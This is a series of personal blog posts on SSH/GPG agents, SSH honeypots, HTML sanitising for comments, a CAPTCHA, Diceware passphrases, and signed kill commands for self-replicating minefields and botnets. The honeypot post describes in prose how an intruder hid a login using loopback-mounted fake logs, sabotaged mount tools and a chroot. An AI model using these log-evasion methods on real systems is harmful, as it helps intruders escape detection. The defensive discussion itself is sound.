That’s pretty cool if you ask me! Now this was an extremely simplified situation. There’s no branching, no intermediate values, no function calls, and I didn’t even touch the stack (push, pop). The recurrence relation definition in this challenge is practically an assembly language itself, so after the initial setup it’s a 1:1 translation.
I’d like to build a JIT compiler more advanced than this in the future. I just need to find a suitable problem that’s more complicated than this one, warrants having a JIT compiler, but is still simple enough that I could, on some level, justify not using LLVM.
]]>*-agent
programs. The agents
allow you to gain a whole lot of convenience without compromising your
security. Many people seem to be unaware these tools exist, so here’s
an overview along with some tips on how to use them effectively.
Let’s start from the top.
Both SSH and GPG involve the use of asymmetric encryption, and the private key is protected by a user-entered passphrase. The private key is generally never written in to the filesystem in plaintext. In the case of GPG, these keys are the primary focus of the application. For SSH, they’re a useful tool to make accessing remote machines less tedious. (The SSH server is authenticated by a public key, too, but this is unrelated to agents.)
For those who are unaware, rather than enter a password when logging into a remove machine, you can identify yourself by a public key. Generating a key is simple.
ssh-keygen
You’ll almost certainly want to accept the default location for the
key (~/.ssh/id_rsa
) because this is where SSH will look for it. Make
sure you enter a passphrase, which will encrypt the private key. The
reason this is important is because, without it, anyone who gains
access to your id_rsa
file will be able to access any remote systems
that have been told to trust your public key. By having a passphrase,
this person needs not only the id_rsa
file, but also the passphrase
(two-factor authentication), so you probably want to pick a long,
strong one. This may sound inconvenient, but ssh-agent
will help
you.
The key generation process will create two files: id_rsa
(private
key) and id_rsa.pub
(public key). The latter is what you give to
remote systems.
Telling a remote system about your key is simple,
ssh-copy-id <host>
This will copy your id_rsa.pub
to the remote system, prompting you
for the password on the remote system (not the passphrase you just
entered), adding it to the file ~/.ssh/authorized_keys
. From this
point on, all logins will use your new keypair rather than prompt you
for a password. Since you put a passphrase on your key, this may seem
pointless — it seems you still need to type in a password for every
connection. Bear with me here!
As a side note, you should have a unique SSH keypair for each site, so you’ll have several of them. This way you can revoke access to a particular site without affecting the others.
For GPG — the GNU Privacy Guard, the free software PGP
implementation — your keys are stored under ~/.gnupg/
in a
database. Generating a key is also a simple command,
gpg --gen-key
This is a slightly more complicated process, which I won’t get into here. In contrast to SSH, you’ll generally have only one keypair per identity (i.e. you only have one).
So you’ve got these keys are encrypted by passphrases. If they’re going to be any use then they’ll be long, annoying things that are a pain to type in. If that was the end of the story this would be really inconvenient, enough to make the use of passphrases too costly for many people to bother. Fortunately, we have agents to help.
An agent is a daemon process that can hold onto your passphrase
(gpg-agent
) or your private key (ssh-agent
) so that you only need
to enter your passphrase once within in some period of time (possibly
for the entire life of the agent process), rather than type it many
times over and over again as it’s needed. The agents are very careful
about how they hold on to this sensitive information, such as avoiding
having it written to swap. You can also configure how long you want
them to hold onto your passphrase/key before purging it from memory.
The ssh
and gpg
programs need to know where to find the
agents. This is done through environmental variables. For ssh-agent
,
the process ID is stored in SSH_AGENT_PID
and the location of the
Unix socket for communication is in SSH_AUTH_SOCK
. gpg-agent
stuffs everything into one variable, GPG_AGENT_INFO
(which is a pain
if you want to use this information in a script). When the main
program is invoked and it needs to use the private key, it will use
these variables and get in touch with the agent to see if it can
supply the needed information without bothering the user.
Remember, a process can’t change the environment of their parent process so you need to set this information in the agent’s parent shell somehow. There are two methods to set these up: eval and exec.
When you start the agent, it forks off its daemon process and prints
the variable information to stdout. This can be eval
ed directly into
the current environment. You could drop these lines directly in your
.bashrc
so that the agents are always there. (Though they won’t exit
with your shell, lingering around uselessly! More on this ahead.)
eval $(ssh-agent)
eval $(gpg-agent --daemon)
For the exec method, you replace your current shell with a new one with a modified environment. To do this, you ask the agent to exec into a shell, with the variables set, rather than return control.
exec ssh-agent bash
exec gpg-agent --daemon bash
As cool trick, you can chain these together. ssh-agent
becomes
gpg-agent
which then becomes bash
.
exec ssh-agent gpg-agent --daemon bash
Note that gpg-agent
is capable of being an ssh-agent
as well by
using the --enable-ssh-support
option, so you don’t need to launch
an ssh-agent
. Unfortunately, I don’t like to use this because
gpg-agent
gets a little too personal with the SSH key, storing its
own copy with its own passphrase again.
On the other hand, gpg-agent
is much more advanced than OpenSSH’s
ssh-agent
. When you want to have ssh-agent
manage a key, you need
to first tell it about the key with ssh-add
. With no arguments, it
will use ~/.ssh/id_rsa
. If you forget to do this, ssh
will ask for
your passphrase directly, in your terminal, not allowing ssh-agent
to hold onto it. By comparison, gpg
will always ask gpg-agent
to
retrieve your passphrase when it’s needed (if the agent is available),
so it will cache your passphrase on demand. No need to explicitly
register with the agent. Even better, it will try its best to use a
“PIN entry” program to read your key, which helps protect against some
kinds of keyloggers — preventing other processes from seeing your
keystrokes.
Well, this is all fine and dandy except when you’ve already got an
agent running. Say you’re launching a new terminal emulator window
from an existing one, creating a new shell. Unfortunately, even though
you have agents running and they’re listed in your environment (from
the origin shell), they’ll still spawn new agents! This is really
lousy behavior, in my opinion. There’s no --inherit
option to tell
them to silently pass along the information of the existing agent if
it appears to be valid. This causes two problems. One, you’ll need to
enter your passphrases again for the new agent. Second, these new
agents will linger around after the spawning shell has exited —
hogging important non-swappable memory.
The direct workaround is to, in your shell init script, check for these variables yourself and check that they’re valid (the agent process is still running) before trying to spawn any agents. This is tedious, error-prone, and makes each user do a lot of work that could have been done in one place by one person instead.
There’s still the problem of when you launch a new shell that doesn’t inherit the variables (i.e. a remote login), so there’s no way for it to be aware of the existing agents. To fix this, you’d need to write the agent information to a file. The shell init script checks this file for an existing agent before spawning one. This is even more complicated, more error-prone, and subject to race-conditions. Why make every use go through this process?!
Fortunately someone’s done all this work so you don’t have to! There’s
an awesome little tool called
Keychain which can be used to
launch the agents for you. It stores the agent information in a file
so that you only ever launch one instance of the agent, and the agents
will be shared across every shell. It does have an --inherit
option — the default behavior, so you don’t even need to ask
nicely. Instead of running the *-agent
s directly, you just put this
in your .bashrc
,
eval $(keychain --eval --quiet)
So simple and it just works! I was so happy when I found this. This is the magic word that makes using agents a breeze, so I can’t recommend it enough.
]]>A honeypot is a fake service or computer on a network used in detecting and deflecting attacks on the network. Ideally, an attacker is unable to tell honeypots apart from real systems, attacking the honeypots instead. In general, honeypots fall into two categories: high-interaction and low-interaction. The former will imitate a real system with high fidelity while the latter may just listen for connections on common ports, without actually accepting or sending data.
What triggered my curiosity was that I wanted to put OpenBSD’s
securelevel(7)
feature to the test. In short, it’s a runtime system value that ranges
from -1 (least secure) to 2 (most secure), and it’s not possible to
decrease the level without gaining physical access to the system. Each
increase makes the system more read-only, and less flexible, so it’s a
trade-off. A system running at level 2 should not carry over any state
between boots — like a LiveCD on a system with no disks.
I set up a fresh OpenBSD install in a QEMU virtual
machine, locked the system down with securelevel
at 1, forwarded the
SSH port all the way out to the Internet, and than gave
Gavin the root password. I told him to go nuts,
with the ultimate goal that when he was done I should be unable to
tell he had even logged into the system. All of the system logs were
set to append-only, enforced through the kernel by securelevel
, so
this should have been a very difficult task indeed.
It turned out he was much more successful than I expected. When he
told me he was done, I SSHed into the system to check the logs finding
that there were no entries indicating he logged in at all. The only
proof I could find that he was actually in was a message he
intentionally left behind for me. Did he just subvert securelevel
?!
Turns out not quite. Whew! I was just putting too much trust into a
system I knew was compromised. He mounted a loopback filesystem
over top of the /var/log
, then filled it with fake logs. He also
sabotaged the mount programs so that they’d hide the loopback mount
from me. Since the mount programs were on a read-only system, he had
to do a loopback mount there, too. After restarting OpenSSH, it was no
longer writing to the append-only log, but to the doctored log.
So, the proper way to check your security logs is by mounting the
compromised filesystem in a known trusted system — or, in this case,
just rebooting would have fixed it. Even with securelevel
, you can’t
check the compromised system in-place. Let this be a lesson to all
those amateur sysadmins out there (including me)!
We did a second round and he managed to trick me again by taking me further into the rabbit hole. Instead of loopback mounts, since I was expecting that, he had root log into a chroot environment, filled with a full copy of the system including fake logs. This version survived reboots and really required inspection from an external system.
After all this, I wanted to crank things up a notch by letting some real attackers into my test system. I was already accustomed to seeing many password-guesses on my SSH server in the logs, so getting someone into my honeypot wouldn’t take long at all. While I didn’t care of they trashed my VM — restoring from snapshot was an automatic process — I really didn’t want them to take advantage of my Internet connection, using it for DDoS attacks or pivoting to attack other SSH servers. So I needed a way to allow them in though SSH, but not allow any other traffic out.
If I was doing this today, I’d probably use iptables
to only allow
SSH in, and then bridge the VM to the Internet with a TUN/TAP,
replacing my real SSH server on port 22. However, three years ago I
didn’t know how to do this. Instead I found a really simple hack to
get this done: tsocks
. tsocks
adds SOCKS proxying to any application by replacing the sockets API
with its own. In my case, I wrapped the VM in tsocks
configured to
use a non-existent SOCKS proxy (127.0.0.1). It could accept any
incoming connection (though limited to SSH because of NAT) but unable
to make any outgoing connections. Perfect!
I hadn’t realized it yet, but this was a high-interaction SSH honeypot I created.
I set the root password to “password” and let it go for awhile, tailing the OpenSSH logs to watch for activity. The brute-force bots would eventually make their way inside but immediately log out and keep guessing passwords for root. Either they were really poorly programmed or they were specifically testing for honeypots that allow different passwords. They must have logged the address for a human to investigate some time in the future, because I never witnessed any shell activity. On the other hand, this was all very difficult to observe, for the same reasons Gavin was able to cover his tracks. My honeypot was useful for catching and detecting attackers, but it wasn’t good for observing them in action.
While I was investigating this I came across Kojoney, which is a low-interaction SSH honeypot mainly for seeing what sorts of passwords attackers were guessing. Unfortunately, I could never get it to work, so I never used it.
Several years passed and I recently came across a project that didn’t exist last time: kippo, a “medium”-interaction SSH honeypot. This is everything I was looking for before. It doesn’t require a full-blown VM, it’s has high fidelity interaction, it’s safe, and it allows me to fully observe all activity — it even records the tty session for replay. Cool!
kippo is written in pure Python, so there shouldn’t be any buffer overflows, and doesn’t execute any external programs. It should be safe, but I’m not aware of any real security reviews, so it’s a use-at-your-own risk thing. They warn about this on their website.
I’ve run this off and on on the weekends. Since I haven’t run my real
SSH server on port 22 since 2009 (no recorded attacks since!), my IP
address atracts much less attention than before, so it hasn’t seen too
much activity. I have had two humans connect and log in. Both
downloaded a well-known script kiddie tool called go.sh
. Here’s an
analysis of the tool by someone who was actually attacked with it:
SSH Bruteforce.
In fact, go.sh
is so well known that it gave me a little scare. In
my tty recording it looked like the tool was actually executed! The
skull banner printed out and it had an interface. I was really nervous
until I found kippo’s
malware.py. Kippo
actually recognizes some script kiddie tools and imitates their
interfaces to further confuse attackers. I do run kippo as an
unprivileged user so it wouldn’t be the end of the world if something
did happen, but
I’d still
be uncomfortable.
There’s neat feature of kippo, which hilariously caught Gavin
off-guard when I had him poke at it. kippo will never disconnect a
session on its own. If an exit
or C-d
is given, it drops into
another fake shell with the hostname “localhost”, merely pretending
to log out. That way you get a chance to see some commands the
attackers are meaning to run on their own system, before they realize
their mistake. The only way to disconnected is to either close your
terminal emulator or use SSH’s ~.
escape sequence.
I’ve been considering running kippo all the time with no password set — using it as a true honeypot. This would help keep anyone from finding my real SSH server, since they would find the honeypot and stop searching other ports. It would also waste time that could be spent attacking other people’s real SSH servers, helping to protect other servers out there. My real SSH server (on my router) doesn’t allow password logins, only key logins, so I already feel pretty good about its security. I’ve never seen a brute-force attempt on the current port anyway. But if I do, I now have kippo as another tool in my security toolbelt.
]]>Many comment/discussion systems get previews wrong. This even includes major sites like Boing Boing and Slashdot. Sometimes they feed back a different comment in the textarea, so repeated previews slowly degrade the comment. Other times the comment preview isn't the same thing as the final result. A comment actually has four states,
The raw comment is the unfiltered string of bytes from the user. This is not safe to give directly back to the user, as it could be exploited to feed an arbitrary page to an innocent user.
The escaped comment is created from the raw comment by
filtering it through the escapeHTML()
function. This
function creates HTML entities out of some of the characters, like
< and >. A browser will interpret the escaped comment as a
simple string, and is safe to give back to the user. This function is
actually provided by perl's CGI module, so perl programmers need not
implement this.
Note that escapeHTML()
is reversible, though the server
side won't need to reverse it. The browser does.
The stripped comment is created from the raw comment by
filtering it through stripHTML()
, which removes
non-whitelisted HTML tags. It also strips non-whitelisted attributes
from allowed tags. It should probably add a
rel="nofollow"
to links. It also runs escapeHTML()
on attribute values and content outside tags. This is safe to give
back to the user because only safe tags are left.
If your comments use markup other than HTML, like BBCode, this function should strip all HTML (your whitelist is empty) and do the conversion from your markup to HTML.
It might also be a good idea for it to produce well-formed HTML. This will allow your comments/discussion pages to be XHTML compliant.
stripHTML()
is irreversible because it dumps information.
The stored comment is the encoding of the comment in the
system. This depends entirely on the storage system. In some cases it
may be identical to the stripped comment (and store
is
the identity function). If the comment is going through SQL into
database, some characters may need to be escaped as to not cause
problems. It could even be a base 64 encoding.
store()
must be unambiguously reversible, and the server
should have an unstore()
to do this. It should probably
also be able to convert any arbitrary string of characters into a safe
encoding for storage.
There should only be one version of all these functions for both previews and final posting of comments.
When doing a comment preview both the escaped comment and the stripped comment are given back to the user. The stripped comment is dropped in as HTML, and the escaped comment is put into the textarea of the form. It would probably be convenient for the user if you give them back any other form information, including the same captcha and their answer to it (or not charge them with a captcha for that comment anymore).
You may be tempted to store the raw comments (safely with
store()
) and do HTML stripping on the fly. This would
allow you to upgrade your HTML stripping function in the future to
"better" handle user input. I don't recommend it. That's extra
processing for each page request, but worse, it breaks the concept of
the preview, because the comment formatting is subject to change in
the future.
The hardest function to implement is probably stripHTML()
because it needs to be able to handle poorly formed HTML. If you are
using perl, you will probably want to use the HTML::Parser module,
which is what I did. This does everything noted above and also
auto-links anything that looks like a URL, forces proper comment
nesting, automatically makes paragraphs from blank-line-separated
chunks, and almost produces well-formed HTML.
The documentation is basically non-existent, but if you want to
whitelist more tags add them to @allowed_tags
. Use it,
abuse it.
I use this code in my comment system, so you can play around with it by using my preview function.
]]>Update: This post is referring to my old web hosting situation. I'm now using external comment hosting because my blog is now statically hosted.
I finally have a comment system, thanks to pollxn, a blosxom comment system that actually works. There is a link to it, indicating the number of comments, in the bottom of each post. Try it out and say hello.
Unfortunately, pollxn doesn't have any sort of anti-spam or CAPTCHA system. If you look around the Interwebs where other people are using pollxn, you will see everyone has their own little CAPTCHA thing. Well, I am not different. I hacked together my own to keep away automated spammers.
It selects words from the dictionary (of 40,000 words in this case) and encrypts them with Blowfish in CBC mode, with a unique IV each time. This is to passed to the user, who passes it to an image generator which decrypts the word and uses GD in Perl to render it, apply some transforms, and drop a line randomly over it. The user submits the guess of the image along with the encrypted version (hidden field), which is decrypted and compared on the other end. The same encrypted ID cannot be used twice, but thanks to the IV the same word can be used twice.
Here are some samples. If you hit refresh, they will render differently. (Update: not any more. These are just static examples now.)
It's not a great CAPTCHA, but it should be good enough for the low volume of traffic I see here. As I inevitably collect small amounts of spam (by spammers manually passing the CAPTCHA), I will gradually create the needed tools to combat it. I can also easily update the CAPTCHA image algorithm without disrupting the functioning of the website.
I'm sure I will be making improvements to the comment system over time as well. I should make it obfuscate e-mail addresses, for one. Maybe add a preview. And better blosxom integration.
So say hello below! I am excited to finally have a real blog.
]]>Diceware is a method of easy-to-remember, easy-to-type, secure passphrase and password generation. It works completely off-line and requires no computer whatsoever, apart from retrieving the Diceware list. By taking the passphrase generation off-line there is less room for mistakes to be made.
The reason these password are easy to remember is that they are simply a series of words in your native language. This also tends makes them easier to type without lots of practice as you should already be used to typing words.
You can grab the word lists directly,
Diceware Word List
Beale's Diceware Word List
The lists are cryptographically signed by Arnold G. Reinhold so you can verify that I have not tampered with it. I must also note that, unfortunately, the author requires that this list only be distributed non-commercially, which limits its usefulness but allows me to distribute it here.
I also came across another list called DialDice, which I have mirrored here and signed with my own key,
Diceware works by rolling five 6-sided dice (or rolling one 6-sided die five times, etc.) and using the result to look up the word in one of the above lists of 6^5, or 7776, words. Each word is worth about 12.9 bits of entropy,
log2(7776) =~ 12.9248
So if you want a password worth about 40 bits — which is about 7 letters of a random alphanumeric password — you would generate three Diceware words. They can be concatenated in any order and in any fashion. When I use Diceware, I just mash them together, like "lancealertgrow". Note that the space bar makes a distinctive sound when pressed, so if you put spaces between your words a listener will be able to tell how many words you use.
If you don't like what you rolled the first time, DO NOT generate a new one as an attempt to get someting "better". If you do this, you will greatly weaken your passwords because you are selecting passwords from a much smaller pool of possibilities (a very small pool that contains only passwords you like).
The number of possible three-word passwords is 470,184,984,576. That's right: 470 billion. Because you are selecting passwords with dice, each password is as equally likely as the next. Even if an attacker knew you used Diceware and knew what word list you used, that still leaves a handful of guesses out of that 470 billion possibilities.
At first it may be confusing, but it actually doesn't matter what the words are or how long they are. It doesn't matter that there are no capitals or special characters. It is the simple fact that there are 7776 words, and one was selected three times.
7776 * 7776 * 7776 = 470184984576
The Diceware website goes into a bit more detail on this.
If the computer system you use annoyingly requires passwords to contain special characters (which is done to increase entropy in passwords that actually are poor), Diceware also provides a method of adding some of those, which adds a couple more bits worth of entropy. If you don't care about those extra bits, you can throw your own in.
For passphrases, Diceware recommends 6 words, about 77.5 bits, which it claims should be out of range of brute-force attacks from anyone for at least the next 20 years. If you really think you need more than 6 words, you should consider hiring guards for all your computer equipment.
I was working on my own Diceware word list to release into the public domain. The purpose was to provide a word list without any distribution restrictions, unlike all the Diceware lists I have found. But making word lists is hard! I wrote a number a little filters — word length, no sub-words, spell checking, no special characters, etc — to pull out good words from a large word list, then used some sample English text from Wikipedia to get some frequency information so that I am was selecting common words over less common words. I still need to go over the final list by hand to make sure it all looks good. This is a long tedious process. Carefully examining 7776 words is quite a lot of work. Someday I will finish it.
In the event that you don't have any dice available, or you want to be
able to generate Diceware passwords on the fly automatically, I have
written a little program that will use /dev/random
,
assuming there is a true RNG behind it, to roll virtual dice. It can
use a Diceware word list or your local dictionary word list which
contains many more words (usually found at
/usr/share/dict/words
). Grab it here,
To get help, just run it with --help
. So, to generate a
two word password using the local dictionary,
$ ./passgen.pl -w2 Bits per word: 14.4421011596755 Key length: 28.8842023193511 grisly cog
It also tells you how many bits the password is worth.
I highly recommend Diceware for your password and passphrase generation.
]]>Some time ago I was watching through the entire series of Deep Space 9. It was a Star Trek television show about a space station that rests next a wormhole that connects to the other side of the galaxy (The Delta quadrant).
The Delta quadrant is ruled by a group called the Dominion, and they are looking to conquer the Federation side of the galaxy (the Alpha quadrant). At one point during the series, the Federation needs to temporarily disable the wormhole to prevent Dominion ships from crossing through. They do this by mining the wormhole with identical, cloaked, self-replicating mines.
If a mine is destroyed, the neighboring mines will replicate a replacement. The minefield repairs itself. This makes removing the minefield within a reasonable amount of time difficult to impossible. If even a single mine is left behind, it can replicate the entire minefield again.
The most interesting question here is this:
When the Federation returns and wants to remove the minefield, how would they do it? What would stop the Dominion from doing the same thing?
The first thing that comes to mind is having a kill signal, but what would this signal be? It could simply be a plain "kill" command, but the Dominion could also broadcast such a signal to disable the minefield. Consider that the Dominion could capture a single mine and study everything about its workings. The minefield itself could therefore hold no secrets whatsoever. This leaves out any possibility of a secret kill command stored in the mines.
Here's what I would do, assuming that humans or aliens have not yet discovered some giant breakthrough in factoring in the Star Trek universe. I would randomly generate two very large prime numbers. Today, two 1024-bit primes should be more than enough, but in 350 years even larger numbers would probably be necessary. Then, I multiply these two number together and store this number in the mine software. To disable the minefield, I simply broadcast these two numbers into the minefield. The mines would be programmed to take the product of any pairs of numbers it receives. If the product matches the internal number, the mine shuts down.
Voila! A method for shutting down the minefield. The enemy can know everything about every single mine's construction, including the software and data stored on every mine, but will be unable to disable the minefield without factoring a very large composite number, which would presumably be difficult or impossible (within a reasonable amount of time).
Another possibility would be using a hash. Come up with a strong passphrase, then use a hashing algorithm like SHA-1 or MD5, or whatever is available and appropriate in 350 years, to hash the passphrase. Store the hash in the mines. When you want to disable the minefield, broadcast the passphrase. These mines will hash the broadcast and compare it to the stored hash. It's really the same solution as before: a one-way function. This is also similar to how passwords are stored inside a computer today.
If we wanted more commands, like "don't blow up any ships for awhile" or "increase minefield density", we could generate more composites corresponding to each command. However, once a command is issued, the secret — the two prime numbers — is out, and it cannot be used again. In this case, I would go into the realm of public key cryptography.
I would issue a command, along with a timestamp, and maybe even a nonce that could double as a global identifier for the command, and sign the whole deal using my private key. On each mine I would store the public key. When a command is received, the mines would check the signature before executing the command. I could then issue repeat commands, as the timestamps would change each time. An adversary learns nothing when a command is issued, because the time stamps would make any replay attacks useless.
Minefields just like this exist today all over the Internet, as botnets. Thousands of computers all around the world become infected with malware and come under the control of a single individual or group. Individual machines in the botnet could be taken out, but removing the entire botnet is difficult as it grows and repairs itself. Any security researcher could disassemble the botnet malware and learn anything about it, so the malware can store no secrets. How does a malicious person control the botnet, then, without someone else taking control? Public key cryptography, just as described above.
]]>